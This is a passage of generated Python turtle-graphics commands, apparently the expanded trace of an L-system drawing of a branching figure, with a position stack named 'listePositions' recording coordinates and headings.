pu(), setposition((55.11,197.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,197.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,197.04)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,211.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,211.82)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((76.01,217.94), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.01,217.94)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((76.01,217.94), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((76.01,217.94)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((87.33,229.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.33,229.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((87.33,229.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((87.33,229.26)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((93.45,244.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.45,244.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 45.0), ((93.45,244.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.45,244.04)), setheading(67.5) ;
pu(), setposition((61.23,211.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((61.23,227.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,227.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((61.23,227.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((61.23,227.82)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((67.35,242.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,242.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((67.35,242.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,242.60)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((78.67,253.92), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.67,253.92)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((61.23,211.82), 67.5), ((78.67,253.92), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.67,253.92)), setheading(45.0) ;
pu(), setposition((61.23,211.82)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((67.35,226.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,226.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((67.35,226.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((67.35,226.60)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,241.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,241.38)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((88.26,247.51), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.26,247.51)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((88.26,247.51), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.26,247.51)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((99.57,258.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.57,258.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((99.57,258.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((99.57,258.82)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((105.69,273.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((105.69,273.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((105.69,273.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((105.69,273.60)), setheading(67.5) ;
pu(), setposition((73.48,241.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,257.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,257.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((73.48,257.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((73.48,257.38)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((79.60,272.17), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((79.60,272.17)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((79.60,272.17), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((79.60,272.17)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((90.91,283.48), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,283.48)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 67.5), ((90.91,283.48), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((90.91,283.48)), setheading(45.0) ;
pu(), setposition((73.48,241.38)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((88.26,247.51), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.26,247.51)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((88.26,247.51), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((88.26,247.51)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.04,253.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((103.04,253.63)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((117.82,247.51), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.82,247.51)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((117.82,247.51), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((117.82,247.51)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((133.82,247.51), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((133.82,247.51)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((133.82,247.51), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((133.82,247.51)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((148.60,253.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.60,253.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 0.0), ((148.60,253.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.60,253.63)), setheading(22.5) ;
pu(), setposition((103.04,253.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((114.35,264.94), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.35,264.94)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((114.35,264.94), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.35,264.94)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((129.14,271.07), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((129.14,271.07)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((129.14,271.07), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((129.14,271.07)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((145.14,271.07), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.14,271.07)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((103.04,253.63), 22.5), ((145.14,271.07), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.14,271.07)), setheading(0.0) ;
pu(), setposition((103.04,253.63)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((114.35,264.94), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.35,264.94)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((114.35,264.94), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((114.35,264.94)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.67,276.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((125.67,276.26)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((141.67,276.26), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((141.67,276.26)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((141.67,276.26), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((141.67,276.26)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((156.45,282.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((156.45,282.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((156.45,282.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((156.45,282.38)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((167.76,293.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((167.76,293.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 22.5), ((167.76,293.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((167.76,293.69)), setheading(45.0) ;
pu(), setposition((125.67,276.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((131.79,291.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.79,291.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((131.79,291.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.79,291.04)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((143.10,302.35), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.10,302.35)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((143.10,302.35), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.10,302.35)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((157.89,308.48), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((157.89,308.48)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((125.67,276.26), 45.0), ((157.89,308.48), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((157.89,308.48)), setheading(22.5) ;
pu(), setposition((125.67,276.26)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((131.79,291.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.79,291.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((131.79,291.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((131.79,291.04)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.91,305.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.91,305.82)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((152.69,311.95), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((152.69,311.95)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((152.69,311.95), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((152.69,311.95)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((164.01,323.26), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((164.01,323.26)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((164.01,323.26), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((164.01,323.26)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((170.13,338.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((170.13,338.04)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 45.0), ((170.13,338.04), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((170.13,338.04)), setheading(67.5) ;
pu(), setposition((137.91,305.82)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((137.91,321.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.91,321.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((137.91,321.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.91,321.82)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((144.04,336.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((144.04,336.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((73.48,241.38), 45.0), ((137.91,305.82), 67.5), ((144.04,336.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((144.04,336.60)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
